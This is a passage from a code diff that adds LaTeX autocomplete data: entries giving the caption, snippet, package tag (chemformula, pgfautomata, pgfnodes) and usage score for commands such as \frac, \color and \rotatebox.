0.040463088537699636, + }, + { + caption: '\\arg', + snippet: '\\arg', + meta: 'chemformula-cmd', + score: 0.007190995792600074, + }, + { + caption: '\\cos', + snippet: '\\cos', + meta: 'chemformula-cmd', + score: 0.050370402546134785, + }, + { + caption: '\\cos{}', + snippet: '\\cos{$1}', + meta: 'chemformula-cmd', + score: 0.050370402546134785, + }, + { + caption: '\\varliminf', + snippet: '\\varliminf', + meta: 'chemformula-cmd', + score: 6.204977642542802e-5, + }, + { + caption: '\\hom', + snippet: '\\hom', + meta: 'chemformula-cmd', + score: 8.180643329881783e-5, + }, + { + caption: '\\tan', + snippet: '\\tan', + meta: 'chemformula-cmd', + score: 0.006176447465423192, + }, + { + caption: '\\det', + snippet: '\\det', + meta: 'chemformula-cmd', + score: 0.005640718203101287, + }, + { + caption: '\\ln', + snippet: '\\ln', + meta: 'chemformula-cmd', + score: 0.025366949660913504, + }, + { + caption: '\\ln{}', + snippet: '\\ln{$1}', + meta: 'chemformula-cmd', + score: 0.025366949660913504, + }, + { + caption: '\\cosh', + snippet: '\\cosh', + meta: 'chemformula-cmd', + score: 0.0008896391580266903, + }, + { + caption: '\\cosh{}', + snippet: '\\cosh{$1}', + meta: 'chemformula-cmd', + score: 0.0008896391580266903, + }, + { + caption: '\\gcd', + snippet: '\\gcd', + meta: 'chemformula-cmd', + score: 0.002254008371792865, + }, + { + caption: '\\limsup', + snippet: '\\limsup', + meta: 'chemformula-cmd', + score: 0.002354950225950599, + }, + { + caption: '\\limsup{}', + snippet: '\\limsup{$1}', + meta: 'chemformula-cmd', + score: 0.002354950225950599, + }, + { + caption: '\\inf', + snippet: '\\inf', + meta: 'chemformula-cmd', + score: 0.00340470256994063, + }, + { + caption: '\\arccos', + snippet: '\\arccos', + meta: 'chemformula-cmd', + score: 0.001781687642431819, + }, + { + caption: '\\arccos{}', + snippet: '\\arccos{$1}', + meta: 'chemformula-cmd', + score: 0.001781687642431819, + }, + { + caption: '\\ker', + snippet: '\\ker', + meta: 'chemformula-cmd', + score: 0.002475379242338094, + }, + { + caption: '\\cot', + snippet: '\\cot', + meta: 'chemformula-cmd', + score: 0.0003640644365701238, + }, + { + caption: '\\cot{}', + 
snippet: '\\cot{$1}', + meta: 'chemformula-cmd', + score: 0.0003640644365701238, + }, + { + caption: '\\coth{}', + snippet: '\\coth{$1}', + meta: 'chemformula-cmd', + score: 0.00025939638266884963, + }, + { + caption: '\\coth', + snippet: '\\coth', + meta: 'chemformula-cmd', + score: 0.00025939638266884963, + }, + { + caption: '\\varlimsup', + snippet: '\\varlimsup', + meta: 'chemformula-cmd', + score: 6.204977642542802e-5, + }, + { + caption: '\\log', + snippet: '\\log', + meta: 'chemformula-cmd', + score: 0.048131780413380156, + }, + { + caption: '\\varinjlim', + snippet: '\\varinjlim', + meta: 'chemformula-cmd', + score: 0.000361814283649031, + }, + { + caption: '\\deg', + snippet: '\\deg', + meta: 'chemformula-cmd', + score: 0.005542465148816408, + }, + { + caption: '\\arctan', + snippet: '\\arctan', + meta: 'chemformula-cmd', + score: 0.0011971697553682045, + }, + { + caption: '\\dim', + snippet: '\\dim', + meta: 'chemformula-cmd', + score: 0.0038210003967178293, + }, + { + caption: '\\min', + snippet: '\\min', + meta: 'chemformula-cmd', + score: 0.03051120054363316, + }, + { + caption: '\\Pr', + snippet: '\\Pr', + meta: 'chemformula-cmd', + score: 0.010227440663206161, + }, + { + caption: '\\Pr[]', + snippet: '\\Pr[$1]', + meta: 'chemformula-cmd', + score: 0.010227440663206161, + }, + { + caption: '\\tanh', + snippet: '\\tanh', + meta: 'chemformula-cmd', + score: 0.0021229156376192525, + }, + { + caption: '\\tanh{}', + snippet: '\\tanh{$1}', + meta: 'chemformula-cmd', + score: 0.0021229156376192525, + }, + { + caption: '\\arcsin', + snippet: '\\arcsin', + meta: 'chemformula-cmd', + score: 0.0007754886988089101, + }, + { + caption: '\\arcsin{}', + snippet: '\\arcsin{$1}', + meta: 'chemformula-cmd', + score: 0.0007754886988089101, + }, + { + caption: '\\DeclareMathOperator{}{}', + snippet: '\\DeclareMathOperator{$1}{$2}', + meta: 'chemformula-cmd', + score: 0.029440493885398676, + }, + { + caption: '\\csc', + snippet: '\\csc', + meta: 'chemformula-cmd', + score: 0.00013963711107573638, + }, + { + caption: '\\sup', + snippet: '\\sup', + meta: 'chemformula-cmd', + score: 0.009355514755312534, + }, + { + caption: '\\sec', + snippet: '\\sec', + meta: 'chemformula-cmd', + score: 0.0005912636157903734, + }, + { + caption: '\\varprojlim', + snippet: '\\varprojlim', + meta: 'chemformula-cmd', + score: 0.0004286136584068833, + }, + { + caption: '\\stepcounter{}', + snippet: '\\stepcounter{$1}', + meta: 'chemformula-cmd', + score: 0.0030745841706804776, + }, + { + caption: '\\addtocounter{}{}', + snippet: '\\addtocounter{$1}{$2}', + meta: 'chemformula-cmd', + score: 0.010241823778997489, + }, + { + caption: '\\text{}', + snippet: '\\text{$1}', + meta: 'chemformula-cmd', + score: 0.3608680734736821, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'chemformula-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'chemformula-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'chemformula-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'chemformula-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'chemformula-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\scalebox{}{}', + snippet: '\\scalebox{$1}{$2}', + meta: 'chemformula-cmd', + score: 0.015973401906548487, + }, + { + caption: '\\reflectbox{}', + snippet: '\\reflectbox{$1}', + meta: 
'chemformula-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\reflectbox', + snippet: '\\reflectbox', + meta: 'chemformula-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\resizebox{}{}{}', + snippet: '\\resizebox{$1}{$2}{$3}', + meta: 'chemformula-cmd', + score: 0.017834153815870245, + }, + { + caption: '\\includegraphics[]{}', + snippet: '\\includegraphics[$1]{$2}', + meta: 'chemformula-cmd', + score: 1.4595731795525781, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'chemformula-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\DeclareGraphicsExtensions{}', + snippet: '\\DeclareGraphicsExtensions{$1}', + meta: 'chemformula-cmd', + score: 0.0055519509468004175, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'chemformula-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\graphicspath{}', + snippet: '\\graphicspath{$1}', + meta: 'chemformula-cmd', + score: 0.09973951908678011, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'chemformula-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'chemformula-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'chemformula-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\DeclareGraphicsRule{}{}{}{}', + snippet: '\\DeclareGraphicsRule{$1}{$2}{$3}{$4}', + meta: 'chemformula-cmd', + score: 0.004649150613625593, + }, + { + caption: '\\definecolors{}', + snippet: '\\definecolors{$1}', + meta: 'chemformula-cmd', + score: 0.0003209840085766927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'chemformula-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'chemformula-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\fcolorbox{}{}{}', + snippet: '\\fcolorbox{$1}{$2}{$3}', + meta: 'chemformula-cmd', + score: 0.00926923425734719, + }, + { + caption: '\\colorlet{}{}', + snippet: '\\colorlet{$1}{$2}', + meta: 'chemformula-cmd', + score: 0.03654388342026623, + }, + { + caption: '\\textcolor{}{}', + snippet: '\\textcolor{$1}{$2}', + meta: 'chemformula-cmd', + score: 0.20852115286477566, + }, + { + caption: '\\selectcolormodel{}', + snippet: '\\selectcolormodel{$1}', + meta: 'chemformula-cmd', + score: 0.000264339771769041, + }, + { + caption: '\\rowcolors{}{}{}', + snippet: '\\rowcolors{$1}{$2}{$3}', + meta: 'chemformula-cmd', + score: 0.0014120076489723356, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'chemformula-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\pagecolor{}', + snippet: '\\pagecolor{$1}', + meta: 'chemformula-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\pagecolor{}{}', + snippet: '\\pagecolor{$1}{$2}', + meta: 'chemformula-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'chemformula-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\definecolor{}{}{}', + snippet: '\\definecolor{$1}{$2}{$3}', + meta: 'chemformula-cmd', + score: 0.16906710888680052, + }, + { + caption: '\\colorbox{}{}', + snippet: '\\colorbox{$1}{$2}', + meta: 'chemformula-cmd', + score: 0.029302172361548254, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'chemformula-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'chemformula-cmd', + score: 
0.2864294797053033, + }, + { + caption: '\\longmapsto', + snippet: '\\longmapsto', + meta: 'chemformula-cmd', + score: 0.0017755897148012264, + }, + { + caption: '\\Check{}', + snippet: '\\Check{$1}', + meta: 'chemformula-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\numberwithin{}{}', + snippet: '\\numberwithin{$1}{$2}', + meta: 'chemformula-cmd', + score: 0.006963729684667191, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'chemformula-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\iff', + snippet: '\\iff', + meta: 'chemformula-cmd', + score: 0.004209937150980285, + }, + { + caption: '\\And', + snippet: '\\And', + meta: 'chemformula-cmd', + score: 0.0011582952152188854, + }, + { + caption: '\\And{}', + snippet: '\\And{$1}', + meta: 'chemformula-cmd', + score: 0.0011582952152188854, + }, + { + caption: '\\oint', + snippet: '\\oint', + meta: 'chemformula-cmd', + score: 0.0028650540724050534, + }, + { + caption: '\\boxed{}', + snippet: '\\boxed{$1}', + meta: 'chemformula-cmd', + score: 0.0035536135737312827, + }, + { + caption: '\\Ddot{}', + snippet: '\\Ddot{$1}', + meta: 'chemformula-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\ignorespacesafterend', + snippet: '\\ignorespacesafterend', + meta: 'chemformula-cmd', + score: 0.0010893680553454854, + }, + { + caption: '\\nonumber', + snippet: '\\nonumber', + meta: 'chemformula-cmd', + score: 0.051980653969641216, + }, + { + caption: '\\Breve{}', + snippet: '\\Breve{$1}', + meta: 'chemformula-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\mapsto', + snippet: '\\mapsto', + meta: 'chemformula-cmd', + score: 0.006473769486518971, + }, + { + caption: '\\over{}', + snippet: '\\over{$1}', + meta: 'chemformula-cmd', + score: 0.0054372322008878786, + }, + { + caption: '\\over', + snippet: '\\over', + meta: 'chemformula-cmd', + score: 0.0054372322008878786, + }, + { + caption: '\\bigotimes', + snippet: '\\bigotimes', + meta: 'chemformula-cmd', + score: 0.000984722260624791, + }, + { + caption: '\\bigoplus', + snippet: '\\bigoplus', + meta: 'chemformula-cmd', + score: 0.0011508785476242003, + }, + { + caption: '\\theequation', + snippet: '\\theequation', + meta: 'chemformula-cmd', + score: 0.002995924112493351, + }, + { + caption: '\\bigcap', + snippet: '\\bigcap', + meta: 'chemformula-cmd', + score: 0.005709261168797874, + }, + { + caption: '\\xrightarrow{}', + snippet: '\\xrightarrow{$1}', + meta: 'chemformula-cmd', + score: 0.004163642482777231, + }, + { + caption: '\\xrightarrow[]{}', + snippet: '\\xrightarrow[$1]{$2}', + meta: 'chemformula-cmd', + score: 0.004163642482777231, + }, + { + caption: '\\atop', + snippet: '\\atop', + meta: 'chemformula-cmd', + score: 0.0006518541515279979, + }, + { + caption: '\\dfrac{}{}', + snippet: '\\dfrac{$1}{$2}', + meta: 'chemformula-cmd', + score: 0.05397545277891961, + }, + { + caption: '\\pmod', + snippet: '\\pmod', + meta: 'chemformula-cmd', + score: 0.0011773327219377148, + }, + { + caption: '\\pmod{}', + snippet: '\\pmod{$1}', + meta: 'chemformula-cmd', + score: 0.0011773327219377148, + }, + { + caption: '\\notag', + snippet: '\\notag', + meta: 'chemformula-cmd', + score: 0.00322520920930312, + }, + { + caption: '\\int', + snippet: '\\int', + meta: 'chemformula-cmd', + score: 0.11946660537765894, + }, + { + caption: '\\Vec{}', + snippet: '\\Vec{$1}', + meta: 'chemformula-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\bigvee', + snippet: '\\bigvee', + meta: 'chemformula-cmd', + score: 0.0011677288242806726, + }, + { + caption: '\\sum', 
+ snippet: '\\sum', + meta: 'chemformula-cmd', + score: 0.42607994509619934, + }, + { + caption: '\\hookrightarrow', + snippet: '\\hookrightarrow', + meta: 'chemformula-cmd', + score: 0.0015607282046545064, + }, + { + caption: '\\bigsqcup', + snippet: '\\bigsqcup', + meta: 'chemformula-cmd', + score: 0.0003468284144579442, + }, + { + caption: '\\hookleftarrow', + snippet: '\\hookleftarrow', + meta: 'chemformula-cmd', + score: 0.0016498799924012809, + }, + { + caption: '\\Dot{}', + snippet: '\\Dot{$1}', + meta: 'chemformula-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\dots', + snippet: '\\dots', + meta: 'chemformula-cmd', + score: 0.0847414497955395, + }, + { + caption: '\\genfrac{}{}{}{}{}{}', + snippet: '\\genfrac{$1}{$2}{$3}{$4}{$5}{$6}', + meta: 'chemformula-cmd', + score: 0.004820143328295316, + }, + { + caption: '\\genfrac', + snippet: '\\genfrac', + meta: 'chemformula-cmd', + score: 0.004820143328295316, + }, + { + caption: '\\cfrac{}{}', + snippet: '\\cfrac{$1}{$2}', + meta: 'chemformula-cmd', + score: 0.006765684097139381, + }, + { + caption: '\\Acute{}', + snippet: '\\Acute{$1}', + meta: 'chemformula-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\ldots', + snippet: '\\ldots', + meta: 'chemformula-cmd', + score: 0.11585556755884258, + }, + { + caption: '\\coprod', + snippet: '\\coprod', + meta: 'chemformula-cmd', + score: 0.00011383372700282614, + }, + { + caption: '\\impliedby', + snippet: '\\impliedby', + meta: 'chemformula-cmd', + score: 2.3482915591834053e-5, + }, + { + caption: '\\big', + snippet: '\\big', + meta: 'chemformula-cmd', + score: 0.05613164277964739, + }, + { + caption: '\\idotsint', + snippet: '\\idotsint', + meta: 'chemformula-cmd', + score: 1.3908704929884828e-5, + }, + { + caption: '\\Longrightarrow', + snippet: '\\Longrightarrow', + meta: 'chemformula-cmd', + score: 0.002459139437356601, + }, + { + caption: '\\allowdisplaybreaks', + snippet: '\\allowdisplaybreaks', + meta: 'chemformula-cmd', + score: 0.005931777024772073, + }, + { + caption: '\\eqref{}', + snippet: '\\eqref{$1}', + meta: 'chemformula-cmd', + score: 0.06345266254167037, + }, + { + caption: '\\mod', + snippet: '\\mod', + meta: 'chemformula-cmd', + score: 0.0015181439193121889, + }, + { + caption: '\\mod{}', + snippet: '\\mod{$1}', + meta: 'chemformula-cmd', + score: 0.0015181439193121889, + }, + { + caption: '\\arraystretch', + snippet: '\\arraystretch', + meta: 'chemformula-cmd', + score: 0.022224283488673075, + }, + { + caption: '\\arraystretch{}', + snippet: '\\arraystretch{$1}', + meta: 'chemformula-cmd', + score: 0.022224283488673075, + }, + { + caption: '\\bigg', + snippet: '\\bigg', + meta: 'chemformula-cmd', + score: 0.04318078602869565, + }, + { + caption: '\\underset{}{}', + snippet: '\\underset{$1}{$2}', + meta: 'chemformula-cmd', + score: 0.012799893214578391, + }, + { + caption: '\\dotsc', + snippet: '\\dotsc', + meta: 'chemformula-cmd', + score: 0.0008555101484119994, + }, + { + caption: '\\doteq', + snippet: '\\doteq', + meta: 'chemformula-cmd', + score: 3.164631070474435e-5, + }, + { + caption: '\\leftroot{}', + snippet: '\\leftroot{$1}', + meta: 'chemformula-cmd', + score: 6.625561928497235e-5, + }, + { + caption: '\\substack{}', + snippet: '\\substack{$1}', + meta: 'chemformula-cmd', + score: 0.0037482529712850755, + }, + { + caption: '\\Hat{}', + snippet: '\\Hat{$1}', + meta: 'chemformula-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\frac{}{}', + snippet: '\\frac{$1}{$2}', + meta: 'chemformula-cmd', + score: 1.4341091141105058, + }, + 
{ + caption: '\\mspace{}', + snippet: '\\mspace{$1}', + meta: 'chemformula-cmd', + score: 3.423236656565836e-5, + }, + { + caption: '\\Bar{}', + snippet: '\\Bar{$1}', + meta: 'chemformula-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\Grave{}', + snippet: '\\Grave{$1}', + meta: 'chemformula-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\implies', + snippet: '\\implies', + meta: 'chemformula-cmd', + score: 0.021828316911576096, + }, + { + caption: '\\tbinom', + snippet: '\\tbinom', + meta: 'chemformula-cmd', + score: 1.3908704929884828e-5, + }, + { + caption: '\\dotsi', + snippet: '\\dotsi', + meta: 'chemformula-cmd', + score: 2.7817409859769657e-5, + }, + { + caption: '\\bigwedge', + snippet: '\\bigwedge', + meta: 'chemformula-cmd', + score: 0.000347742918592393, + }, + { + caption: '\\sideset{}{}', + snippet: '\\sideset{$1}{$2}', + meta: 'chemformula-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\smash{}', + snippet: '\\smash{$1}', + meta: 'chemformula-cmd', + score: 0.008197171096663127, + }, + { + caption: '\\smash[]{}', + snippet: '\\smash[$1]{$2}', + meta: 'chemformula-cmd', + score: 0.008197171096663127, + }, + { + caption: '\\colon', + snippet: '\\colon', + meta: 'chemformula-cmd', + score: 0.005300291684408929, + }, + { + caption: '\\intertext{}', + snippet: '\\intertext{$1}', + meta: 'chemformula-cmd', + score: 0.0016148076375871775, + }, + { + caption: '\\Longleftarrow', + snippet: '\\Longleftarrow', + meta: 'chemformula-cmd', + score: 8.477207854183949e-5, + }, + { + caption: '\\prod', + snippet: '\\prod', + meta: 'chemformula-cmd', + score: 0.02549889375975901, + }, + { + caption: '\\AmS', + snippet: '\\AmS', + meta: 'chemformula-cmd', + score: 0.00047859486202980376, + }, + { + caption: '\\overline{}', + snippet: '\\overline{$1}', + meta: 'chemformula-cmd', + score: 0.11280487530505384, + }, + { + caption: '\\tfrac{}{}', + snippet: '\\tfrac{$1}{$2}', + meta: 'chemformula-cmd', + score: 0.0005923542426657187, + }, + { + caption: '\\uproot{}', + snippet: '\\uproot{$1}', + meta: 'chemformula-cmd', + score: 6.625561928497235e-5, + }, + { + caption: '\\bmod', + snippet: '\\bmod', + meta: 'chemformula-cmd', + score: 0.002022594681005002, + }, + { + caption: '\\bmod{}', + snippet: '\\bmod{$1}', + meta: 'chemformula-cmd', + score: 0.002022594681005002, + }, + { + caption: '\\pod{}', + snippet: '\\pod{$1}', + meta: 'chemformula-cmd', + score: 2.7817409859769657e-5, + }, + { + caption: '\\label{}', + snippet: '\\label{$1}', + meta: 'chemformula-cmd', + score: 1.897791904799601, + }, + { + caption: '\\longrightarrow', + snippet: '\\longrightarrow', + meta: 'chemformula-cmd', + score: 0.013399422292458848, + }, + { + caption: '\\xleftarrow[]{}', + snippet: '\\xleftarrow[$1]{$2}', + meta: 'chemformula-cmd', + score: 3.5779964196240445e-5, + }, + { + caption: '\\xleftarrow{}', + snippet: '\\xleftarrow{$1}', + meta: 'chemformula-cmd', + score: 3.5779964196240445e-5, + }, + { + caption: '\\mathaccentV', + snippet: '\\mathaccentV', + meta: 'chemformula-cmd', + score: 6.216218551413489e-5, + }, + { + caption: '\\hdotsfor{}', + snippet: '\\hdotsfor{$1}', + meta: 'chemformula-cmd', + score: 0.00024247684499275043, + }, + { + caption: '\\hdotsfor[]{}', + snippet: '\\hdotsfor[$1]{$2}', + meta: 'chemformula-cmd', + score: 0.00024247684499275043, + }, + { + caption: '\\Bigg', + snippet: '\\Bigg', + meta: 'chemformula-cmd', + score: 0.015507614799858266, + }, + { + caption: '\\Bigg[]', + snippet: '\\Bigg[$1]', + meta: 'chemformula-cmd', + score: 
0.015507614799858266, + }, + { + caption: '\\overset{}{}', + snippet: '\\overset{$1}{$2}', + meta: 'chemformula-cmd', + score: 0.007611544955294224, + }, + { + caption: '\\Big', + snippet: '\\Big', + meta: 'chemformula-cmd', + score: 0.050370758781422345, + }, + { + caption: '\\longleftrightarrow', + snippet: '\\longleftrightarrow', + meta: 'chemformula-cmd', + score: 0.0002851769278703356, + }, + { + caption: '\\Longleftrightarrow', + snippet: '\\Longleftrightarrow', + meta: 'chemformula-cmd', + score: 0.0004896780659212191, + }, + { + caption: '\\Longleftrightarrow{}', + snippet: '\\Longleftrightarrow{$1}', + meta: 'chemformula-cmd', + score: 0.0004896780659212191, + }, + { + caption: '\\binom{}{}', + snippet: '\\binom{$1}{$2}', + meta: 'chemformula-cmd', + score: 0.013010882180364367, + }, + { + caption: '\\longleftarrow', + snippet: '\\longleftarrow', + meta: 'chemformula-cmd', + score: 0.0011096532692473691, + }, + { + caption: '\\dbinom{}{}', + snippet: '\\dbinom{$1}{$2}', + meta: 'chemformula-cmd', + score: 0.006800272303210672, + }, + { + caption: '\\Tilde{}', + snippet: '\\Tilde{$1}', + meta: 'chemformula-cmd', + score: 7.874446783586035e-5, + }, + { + caption: '\\bigcup', + snippet: '\\bigcup', + meta: 'chemformula-cmd', + score: 0.0058847868741168765, + }, + { + caption: '\\pmb{}', + snippet: '\\pmb{$1}', + meta: 'chemformula-cmd', + score: 0.019171182556792562, + }, + { + caption: '\\boldsymbol{}', + snippet: '\\boldsymbol{$1}', + meta: 'chemformula-cmd', + score: 0.18137737738638837, + }, + { + caption: '\\boldsymbol', + snippet: '\\boldsymbol', + meta: 'chemformula-cmd', + score: 0.18137737738638837, + }, + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'chemformula-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 'chemformula-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\setboolean{}{}', + snippet: '\\setboolean{$1}{$2}', + meta: 'chemformula-cmd', + score: 0.0012203054938872515, + }, + { + caption: '\\newboolean{}', + snippet: '\\newboolean{$1}', + meta: 'chemformula-cmd', + score: 0.0009170966832172938, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'chemformula-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\boolean{}', + snippet: '\\boolean{$1}', + meta: 'chemformula-cmd', + score: 0.0018957469739775527, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'chemformula-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'chemformula-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'chemformula-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\sfrac{}{}', + snippet: '\\sfrac{$1}{$2}', + meta: 'chemformula-cmd', + score: 0.0030164694688453453, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'chemformula-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'chemformula-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\frenchspacing', + snippet: '\\frenchspacing', + meta: 'chemformula-cmd', + score: 0.0063276692758974925, + }, + ], + pgfautomata: [ + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'pgfautomata-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'pgfautomata-cmd', + score: 0.021170869458413965, + }, + { 
+ caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'pgfautomata-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\scalebox{}{}', + snippet: '\\scalebox{$1}{$2}', + meta: 'pgfautomata-cmd', + score: 0.015973401906548487, + }, + { + caption: '\\reflectbox{}', + snippet: '\\reflectbox{$1}', + meta: 'pgfautomata-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\reflectbox', + snippet: '\\reflectbox', + meta: 'pgfautomata-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\resizebox{}{}{}', + snippet: '\\resizebox{$1}{$2}{$3}', + meta: 'pgfautomata-cmd', + score: 0.017834153815870245, + }, + { + caption: '\\includegraphics[]{}', + snippet: '\\includegraphics[$1]{$2}', + meta: 'pgfautomata-cmd', + score: 1.4595731795525781, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'pgfautomata-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\DeclareGraphicsExtensions{}', + snippet: '\\DeclareGraphicsExtensions{$1}', + meta: 'pgfautomata-cmd', + score: 0.0055519509468004175, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'pgfautomata-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\graphicspath{}', + snippet: '\\graphicspath{$1}', + meta: 'pgfautomata-cmd', + score: 0.09973951908678011, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'pgfautomata-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'pgfautomata-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'pgfautomata-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\DeclareGraphicsRule{}{}{}{}', + snippet: '\\DeclareGraphicsRule{$1}{$2}{$3}{$4}', + meta: 'pgfautomata-cmd', + score: 0.004649150613625593, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'pgfautomata-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'pgfautomata-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'pgfautomata-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'pgfautomata-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\definecolors{}', + snippet: '\\definecolors{$1}', + meta: 'pgfautomata-cmd', + score: 0.0003209840085766927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'pgfautomata-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'pgfautomata-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\fcolorbox{}{}{}', + snippet: '\\fcolorbox{$1}{$2}{$3}', + meta: 'pgfautomata-cmd', + score: 0.00926923425734719, + }, + { + caption: '\\colorlet{}{}', + snippet: '\\colorlet{$1}{$2}', + meta: 'pgfautomata-cmd', + score: 0.03654388342026623, + }, + { + caption: '\\textcolor{}{}', + snippet: '\\textcolor{$1}{$2}', + meta: 'pgfautomata-cmd', + score: 0.20852115286477566, + }, + { + caption: '\\selectcolormodel{}', + snippet: '\\selectcolormodel{$1}', + meta: 'pgfautomata-cmd', + score: 0.000264339771769041, + }, + { + caption: '\\rowcolors{}{}{}', + snippet: '\\rowcolors{$1}{$2}{$3}', + meta: 'pgfautomata-cmd', + score: 0.0014120076489723356, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'pgfautomata-cmd', + score: 0.00530510025314411, + }, + { + caption: 
'\\pagecolor{}', + snippet: '\\pagecolor{$1}', + meta: 'pgfautomata-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\pagecolor{}{}', + snippet: '\\pagecolor{$1}{$2}', + meta: 'pgfautomata-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'pgfautomata-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\definecolor{}{}{}', + snippet: '\\definecolor{$1}{$2}{$3}', + meta: 'pgfautomata-cmd', + score: 0.16906710888680052, + }, + { + caption: '\\colorbox{}{}', + snippet: '\\colorbox{$1}{$2}', + meta: 'pgfautomata-cmd', + score: 0.029302172361548254, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'pgfautomata-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'pgfautomata-cmd', + score: 0.2864294797053033, + }, + ], + pgfnodes: [ + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'pgfnodes-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'pgfnodes-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'pgfnodes-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\scalebox{}{}', + snippet: '\\scalebox{$1}{$2}', + meta: 'pgfnodes-cmd', + score: 0.015973401906548487, + }, + { + caption: '\\reflectbox{}', + snippet: '\\reflectbox{$1}', + meta: 'pgfnodes-cmd', + score: 